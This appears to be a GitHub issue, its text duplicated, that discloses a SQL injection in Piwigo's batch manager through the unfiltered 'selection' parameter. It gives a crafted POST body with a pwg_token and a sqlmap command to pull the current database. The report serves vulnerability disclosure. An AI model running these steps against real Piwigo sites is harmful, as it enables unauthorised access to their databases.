I find that there is a sqli in piwigo,here are my descriptions;
At first we need to login and then we can Visit the website http://your-url/admin.php
then we need a Key Parameters called pwg_token,there are many ways to get a token
i visit http://your-url/admin.php?page=user_list
then i got pwg_token=3c28c3bf6adc56b0695cf64073605f9b
The point of vulnerability is in admin/batch_manager_global.php;The parameter selection is not filtered
Unfiltered parametersselection is spliced
The next step is to capture packets using BurpSuite by simply constructing parameters
selection%5B%5D=1&selectAction=delete_derivatives&submit=1&del_derivatives_type=1&del_tags%5B%5D=1&pwg_token=4a3513cd81aa311107704fd00bde0a79
Remember to replace the value of the token above
Save parameters to file,then just use sqlmap to exploit
python sqlmap.py -r 1233 --current-db
The text was updated successfully, but these errors were encountered:
I find that there is a sqli in piwigo,here are my descriptions;





At first we need to login and then we can Visit the website http://your-url/admin.php
then we need a Key Parameters called pwg_token,there are many ways to get a token
i visit http://your-url/admin.php?page=user_list
then i got pwg_token=3c28c3bf6adc56b0695cf64073605f9b
The point of vulnerability is in admin/batch_manager_global.php;The parameter selection is not filtered
Unfiltered parametersselection is spliced
The next step is to capture packets using BurpSuite by simply constructing parameters
selection%5B%5D=1&selectAction=delete_derivatives&submit=1&del_derivatives_type=1&del_tags%5B%5D=1&pwg_token=4a3513cd81aa311107704fd00bde0a79
Remember to replace the value of the token above
Save parameters to file,then just use sqlmap to exploit
python sqlmap.py -r 1233 --current-db
The text was updated successfully, but these errors were encountered: